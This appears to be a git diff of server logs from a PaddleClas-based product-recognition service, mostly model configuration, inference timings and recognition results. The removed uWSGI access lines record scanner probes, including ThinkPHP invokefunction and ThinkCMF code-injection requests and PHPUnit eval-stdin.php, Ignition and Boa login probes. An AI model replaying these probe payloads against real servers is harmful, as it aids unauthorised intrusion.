INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 08:59:33 INFO: enable_benchmark : True +2022-02-14 08:59:33 INFO: enable_mkldnn : True +2022-02-14 08:59:33 INFO: enable_profile : False +2022-02-14 08:59:33 INFO: gpu_mem : 8000 +2022-02-14 08:59:33 INFO: image_shape : [3, 640, 640] +2022-02-14 08:59:33 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 08:59:33 INFO: ir_optim : True +2022-02-14 08:59:33 INFO: labe_list : ['foreground'] +2022-02-14 08:59:33 INFO: max_det_results : 5 +2022-02-14 08:59:33 INFO: rec_inference_model_dir : 
/root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 08:59:33 INFO: rec_nms_thresold : 0.05 +2022-02-14 08:59:33 INFO: threshold : 0.2 +2022-02-14 08:59:33 INFO: use_fp16 : False +2022-02-14 08:59:33 INFO: use_gpu : False +2022-02-14 08:59:33 INFO: use_tensorrt : False +2022-02-14 08:59:33 INFO: IndexProcess : +2022-02-14 08:59:33 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 08:59:33 INFO: return_k : 5 +2022-02-14 08:59:33 INFO: score_thres : 0.5 +2022-02-14 08:59:33 INFO: RecPostProcess : None +2022-02-14 08:59:33 INFO: RecPreProcess : +2022-02-14 08:59:33 INFO: transform_ops : +2022-02-14 08:59:33 INFO: ResizeImage : +2022-02-14 08:59:33 INFO: size : 224 +2022-02-14 08:59:33 INFO: NormalizeImage : +2022-02-14 08:59:33 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:59:33 INFO: order : +2022-02-14 08:59:33 INFO: scale : 0.00392157 +2022-02-14 08:59:33 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:59:33 INFO: ToCHWImage : None +Inference: 372.40147590637207 ms per batch image +[] 234 -["{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.5730278}\n"] -['江小白'] -['江小白', '30'] -[pid: 32765|app: 0|req: 24/43] 210.51.42.176 () {34 vars in 431 bytes} [Wed Nov 3 05:07:05 2021] POST /reference_client/ => generated 114 bytes in 6422 msecs (HTTP/1.1 200) 5 headers in 158 bytes (10 switches on core 0) -[pid: 32765|app: 0|req: 25/44] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 05:18:12 2021] GET / => generated 179 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 18/45] 106.12.223.204 () {36 vars in 488 bytes} [Wed Nov 3 05:18:14 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32764|app: 0|req: 1/46] 209.141.51.171 () {48 vars in 877 bytes} [Wed Nov 3 05:18:32 2021] POST /boaform/admin/formLogin => generated 179 bytes in 382 msecs (HTTP/1.1 404) 5 
headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 26/47] 106.52.34.90 () {44 vars in 748 bytes} [Wed Nov 3 05:23:04 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 27/48] 209.141.56.209 () {40 vars in 568 bytes} [Wed Nov 3 05:23:47 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 28/49] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 05:35:34 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 19/50] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 05:35:35 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 29/51] 60.217.75.69 () {32 vars in 364 bytes} [Wed Nov 3 05:40:28 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 30/52] 45.146.164.110 () {38 vars in 712 bytes} [Wed Nov 3 05:42:33 2021] POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 20/53] 45.146.164.110 () {38 vars in 636 bytes} [Wed Nov 3 05:42:33 2021] POST /Autodiscover/Autodiscover.xml => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32764|app: 0|req: 2/54] 45.146.164.110 () {36 vars in 624 bytes} [Wed Nov 3 05:42:34 2021] GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32763|app: 0|req: 2/55] 45.146.164.110 () {34 vars in 556 bytes} [Wed Nov 3 05:42:34 2021] GET /solr/admin/info/system?wt=json => generated 179 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) 
-[pid: 32765|app: 0|req: 31/56] 45.146.164.110 () {34 vars in 720 bytes} [Wed Nov 3 05:42:35 2021] GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 => generated 179 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 21/57] 45.146.164.110 () {36 vars in 653 bytes} [Wed Nov 3 05:42:35 2021] GET /?a=fetch&content=die(@md5(HelloThinkCMF)) => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 32/58] 45.146.164.110 () {34 vars in 587 bytes} [Wed Nov 3 05:42:36 2021] GET /wp-content/plugins/wp-file-manager/readme.txt => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32761|app: 0|req: 1/59] 45.146.164.110 () {34 vars in 556 bytes} [Wed Nov 3 05:42:35 2021] GET /?XDEBUG_SESSION_START=phpstorm => generated 179 bytes in 261 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 33/60] 45.146.164.110 () {36 vars in 602 bytes} [Wed Nov 3 05:42:36 2021] GET /_ignition/execute-solution => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32763|app: 0|req: 3/61] 45.146.164.110 () {36 vars in 550 bytes} [Wed Nov 3 05:42:36 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32760|app: 0|req: 1/62] 45.146.164.110 () {34 vars in 513 bytes} [Wed Nov 3 05:42:37 2021] GET /console/ => generated 179 bytes in 503 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32759|app: 0|req: 1/63] 45.146.164.110 () {38 vars in 610 bytes} [Wed Nov 3 05:42:37 2021] POST /api/jsonws/invoke => generated 179 bytes in 504 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 34/64] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 05:47:49 2021] GET / => generated 
179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 22/65] 106.12.223.204 () {36 vars in 488 bytes} [Wed Nov 3 05:47:50 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 35/66] 71.6.232.4 () {34 vars in 484 bytes} [Wed Nov 3 05:52:59 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 36/67] 106.12.223.200 () {36 vars in 488 bytes} [Wed Nov 3 06:05:25 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 23/68] 106.12.223.202 () {36 vars in 488 bytes} [Wed Nov 3 06:05:27 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 37/69] 165.227.136.172 () {30 vars in 333 bytes} [Wed Nov 3 06:07:10 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 38/70] 106.12.223.204 () {36 vars in 488 bytes} [Wed Nov 3 06:18:05 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 24/71] 106.12.223.202 () {36 vars in 488 bytes} [Wed Nov 3 06:18:06 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 39/72] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 06:32:36 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 25/73] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 06:32:38 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 40/74] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 06:50:19 2021] GET / => generated 
179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 26/75] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 06:50:21 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 41/76] 103.203.210.237 () {32 vars in 465 bytes} [Wed Nov 3 06:59:25 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 42/77] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 07:05:39 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 27/78] 106.12.223.204 () {36 vars in 488 bytes} [Wed Nov 3 07:05:41 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 43/79] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 07:17:23 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 28/80] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 07:17:24 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 44/81] 83.97.20.34 () {32 vars in 386 bytes} [Wed Nov 3 07:30:11 2021] GET /tomcat.css => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 45/82] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 07:33:22 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 29/83] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 07:33:22 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 46/84] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 07:44:44 2021] GET / => 
generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 30/85] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 07:44:46 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 47/86] 106.12.223.204 () {36 vars in 488 bytes} [Wed Nov 3 07:57:59 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 31/87] 106.12.223.200 () {36 vars in 488 bytes} [Wed Nov 3 07:58:00 2021] GET / => generated 179 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 48/88] 106.12.223.200 () {36 vars in 488 bytes} [Wed Nov 3 08:14:43 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 32/89] 106.12.223.202 () {36 vars in 488 bytes} [Wed Nov 3 08:14:44 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 49/90] 83.97.20.34 () {26 vars in 270 bytes} [Wed Nov 3 08:23:24 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 50/91] 106.12.223.204 () {36 vars in 488 bytes} [Wed Nov 3 08:29:23 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 33/92] 106.12.223.202 () {36 vars in 488 bytes} [Wed Nov 3 08:29:24 2021] GET / => generated 179 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 51/93] 106.12.223.202 () {36 vars in 488 bytes} [Wed Nov 3 08:42:31 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 34/94] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 08:42:32 2021] GET / => 
generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 52/95] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 08:56:50 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 35/96] 106.12.223.202 () {36 vars in 488 bytes} [Wed Nov 3 08:56:51 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 53/97] 210.51.42.187 () {40 vars in 739 bytes} [Wed Nov 3 09:00:57 2021] GET /record/ => generated 18 bytes in 1 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 36/98] 210.51.42.187 () {40 vars in 685 bytes} [Wed Nov 3 09:00:57 2021] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 54/99] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 09:10:25 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 37/100] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 09:10:26 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1143/1345] 223.167.141.7 () {34 vars in 449 bytes} [Mon Feb 14 08:59:32 2022] POST /reference_client/ => generated 98 bytes in 2931 msecs (HTTP/1.1 200) 5 headers in 157 bytes (26 switches on core 0) req -2021-11-03 09:13:42 INFO: +2022-02-14 08:59:44 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! 
== =========================================================== @@ -3427,78 +5373,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 09:13:42 INFO: DetPostProcess : -2021-11-03 09:13:42 INFO: DetPreProcess : -2021-11-03 09:13:42 INFO: transform_ops : -2021-11-03 09:13:42 INFO: DetResize : -2021-11-03 09:13:42 INFO: interp : 2 -2021-11-03 09:13:42 INFO: keep_ratio : False -2021-11-03 09:13:42 INFO: target_size : [640, 640] -2021-11-03 09:13:42 INFO: DetNormalizeImage : -2021-11-03 09:13:42 INFO: is_scale : True -2021-11-03 09:13:42 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 09:13:42 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 09:13:42 INFO: DetPermute : -2021-11-03 09:13:42 INFO: Global : -2021-11-03 09:13:42 INFO: batch_size : 1 -2021-11-03 09:13:42 INFO: cpu_num_threads : 10 -2021-11-03 09:13:42 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 09:13:42 INFO: enable_benchmark : True -2021-11-03 09:13:42 INFO: enable_mkldnn : True -2021-11-03 09:13:42 INFO: enable_profile : False -2021-11-03 09:13:42 INFO: gpu_mem : 8000 -2021-11-03 09:13:42 INFO: image_shape : [3, 640, 640] -2021-11-03 09:13:42 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 09:13:42 INFO: ir_optim : True -2021-11-03 09:13:42 INFO: labe_list : ['foreground'] -2021-11-03 09:13:42 INFO: max_det_results : 5 -2021-11-03 09:13:42 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 09:13:42 INFO: rec_nms_thresold : 0.05 -2021-11-03 09:13:42 INFO: threshold : 0.2 -2021-11-03 09:13:42 INFO: use_fp16 : False -2021-11-03 09:13:42 INFO: use_gpu : False -2021-11-03 09:13:42 INFO: use_tensorrt : False -2021-11-03 09:13:42 INFO: IndexProcess : -2021-11-03 09:13:42 INFO: index_dir : 
/root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 09:13:42 INFO: return_k : 5 -2021-11-03 09:13:42 INFO: score_thres : 0.5 -2021-11-03 09:13:42 INFO: RecPostProcess : None -2021-11-03 09:13:42 INFO: RecPreProcess : -2021-11-03 09:13:42 INFO: transform_ops : -2021-11-03 09:13:42 INFO: ResizeImage : -2021-11-03 09:13:42 INFO: size : 224 -2021-11-03 09:13:42 INFO: NormalizeImage : -2021-11-03 09:13:42 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 09:13:42 INFO: order : -2021-11-03 09:13:42 INFO: scale : 0.00392157 -2021-11-03 09:13:42 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 09:13:42 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. 
---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2355.2846908569336 ms per batch image -[{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.65080917}] -{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.65080917} +2022-02-14 08:59:44 INFO: DetPostProcess : +2022-02-14 08:59:44 INFO: DetPreProcess : +2022-02-14 08:59:44 INFO: transform_ops : +2022-02-14 08:59:44 INFO: DetResize : +2022-02-14 08:59:44 INFO: interp : 2 +2022-02-14 08:59:44 INFO: keep_ratio : False +2022-02-14 08:59:44 INFO: target_size : [640, 640] +2022-02-14 08:59:44 INFO: DetNormalizeImage : +2022-02-14 08:59:44 INFO: is_scale : True +2022-02-14 08:59:44 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:59:44 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:59:44 INFO: DetPermute : +2022-02-14 08:59:44 INFO: Global : +2022-02-14 08:59:44 INFO: batch_size : 1 +2022-02-14 08:59:44 INFO: cpu_num_threads : 1 +2022-02-14 08:59:44 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 08:59:44 INFO: enable_benchmark : True +2022-02-14 08:59:44 INFO: enable_mkldnn : True +2022-02-14 08:59:44 INFO: enable_profile : False +2022-02-14 08:59:44 INFO: gpu_mem : 8000 +2022-02-14 08:59:44 INFO: image_shape : [3, 640, 640] +2022-02-14 08:59:44 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 08:59:44 INFO: ir_optim : True +2022-02-14 08:59:44 INFO: labe_list : ['foreground'] +2022-02-14 08:59:44 INFO: max_det_results : 5 +2022-02-14 08:59:44 INFO: rec_inference_model_dir : 
/root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 08:59:44 INFO: rec_nms_thresold : 0.05 +2022-02-14 08:59:44 INFO: threshold : 0.2 +2022-02-14 08:59:44 INFO: use_fp16 : False +2022-02-14 08:59:44 INFO: use_gpu : False +2022-02-14 08:59:44 INFO: use_tensorrt : False +2022-02-14 08:59:44 INFO: IndexProcess : +2022-02-14 08:59:44 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 08:59:44 INFO: return_k : 5 +2022-02-14 08:59:44 INFO: score_thres : 0.5 +2022-02-14 08:59:44 INFO: RecPostProcess : None +2022-02-14 08:59:44 INFO: RecPreProcess : +2022-02-14 08:59:44 INFO: transform_ops : +2022-02-14 08:59:44 INFO: ResizeImage : +2022-02-14 08:59:44 INFO: size : 224 +2022-02-14 08:59:44 INFO: NormalizeImage : +2022-02-14 08:59:44 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:59:44 INFO: order : +2022-02-14 08:59:44 INFO: scale : 0.00392157 +2022-02-14 08:59:44 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:59:44 INFO: ToCHWImage : None +Inference: 372.7452754974365 ms per batch image +[] 234 -["{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.65080917}\n"] -['江小白'] -['江小白', '30'] -[pid: 32765|app: 0|req: 55/101] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 09:13:35 2021] POST /reference_client/ => generated 114 bytes in 11674 msecs (HTTP/1.1 200) 5 headers in 158 bytes (15 switches on core 0) +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1144/1346] 223.167.141.7 () {34 vars in 448 bytes} [Mon Feb 14 08:59:43 2022] POST /reference_client/ => generated 98 bytes in 2877 msecs (HTTP/1.1 200) 5 headers in 157 bytes (18 switches on core 0) req -2021-11-03 09:14:06 INFO: +2022-02-14 09:11:17 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! 
== =========================================================== @@ -3508,76 +5435,1652 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 09:14:06 INFO: DetPostProcess : -2021-11-03 09:14:06 INFO: DetPreProcess : -2021-11-03 09:14:06 INFO: transform_ops : -2021-11-03 09:14:06 INFO: DetResize : -2021-11-03 09:14:06 INFO: interp : 2 -2021-11-03 09:14:06 INFO: keep_ratio : False -2021-11-03 09:14:06 INFO: target_size : [640, 640] -2021-11-03 09:14:06 INFO: DetNormalizeImage : -2021-11-03 09:14:06 INFO: is_scale : True -2021-11-03 09:14:06 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 09:14:06 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 09:14:06 INFO: DetPermute : -2021-11-03 09:14:06 INFO: Global : -2021-11-03 09:14:06 INFO: batch_size : 1 -2021-11-03 09:14:06 INFO: cpu_num_threads : 10 -2021-11-03 09:14:06 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 09:14:06 INFO: enable_benchmark : True -2021-11-03 09:14:06 INFO: enable_mkldnn : True -2021-11-03 09:14:06 INFO: enable_profile : False -2021-11-03 09:14:06 INFO: gpu_mem : 8000 -2021-11-03 09:14:06 INFO: image_shape : [3, 640, 640] -2021-11-03 09:14:06 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 09:14:06 INFO: ir_optim : True -2021-11-03 09:14:06 INFO: labe_list : ['foreground'] -2021-11-03 09:14:06 INFO: max_det_results : 5 -2021-11-03 09:14:06 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 09:14:06 INFO: rec_nms_thresold : 0.05 -2021-11-03 09:14:06 INFO: threshold : 0.2 -2021-11-03 09:14:06 INFO: use_fp16 : False -2021-11-03 09:14:06 INFO: use_gpu : False -2021-11-03 09:14:06 INFO: use_tensorrt : False -2021-11-03 09:14:06 INFO: IndexProcess : -2021-11-03 09:14:06 INFO: index_dir : 
/root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 09:14:06 INFO: return_k : 5 -2021-11-03 09:14:06 INFO: score_thres : 0.5 -2021-11-03 09:14:06 INFO: RecPostProcess : None -2021-11-03 09:14:06 INFO: RecPreProcess : -2021-11-03 09:14:06 INFO: transform_ops : -2021-11-03 09:14:06 INFO: ResizeImage : -2021-11-03 09:14:06 INFO: size : 224 -2021-11-03 09:14:06 INFO: NormalizeImage : -2021-11-03 09:14:06 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 09:14:06 INFO: order : -2021-11-03 09:14:06 INFO: scale : 0.00392157 -2021-11-03 09:14:06 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 09:14:06 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. 
---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2446.4921951293945 ms per batch image -[{'bbox': [56, 54, 467, 479], 'rec_docs': '江小白', 'rec_scores': 0.655632}] -{'bbox': [56, 54, 467, 479], 'rec_docs': '江小白', 'rec_scores': 0.655632} +2022-02-14 09:11:17 INFO: DetPostProcess : +2022-02-14 09:11:17 INFO: DetPreProcess : +2022-02-14 09:11:17 INFO: transform_ops : +2022-02-14 09:11:17 INFO: DetResize : +2022-02-14 09:11:17 INFO: interp : 2 +2022-02-14 09:11:17 INFO: keep_ratio : False +2022-02-14 09:11:17 INFO: target_size : [640, 640] +2022-02-14 09:11:17 INFO: DetNormalizeImage : +2022-02-14 09:11:17 INFO: is_scale : True +2022-02-14 09:11:17 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:11:17 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:11:17 INFO: DetPermute : +2022-02-14 09:11:17 INFO: Global : +2022-02-14 09:11:17 INFO: batch_size : 1 +2022-02-14 09:11:17 INFO: cpu_num_threads : 1 +2022-02-14 09:11:17 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 09:11:17 INFO: enable_benchmark : True +2022-02-14 09:11:17 INFO: enable_mkldnn : True +2022-02-14 09:11:17 INFO: enable_profile : False +2022-02-14 09:11:17 INFO: gpu_mem : 8000 +2022-02-14 09:11:17 INFO: image_shape : [3, 640, 640] +2022-02-14 09:11:17 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 09:11:17 INFO: ir_optim : True +2022-02-14 09:11:17 INFO: labe_list : ['foreground'] +2022-02-14 09:11:17 INFO: max_det_results : 5 +2022-02-14 09:11:17 INFO: rec_inference_model_dir : 
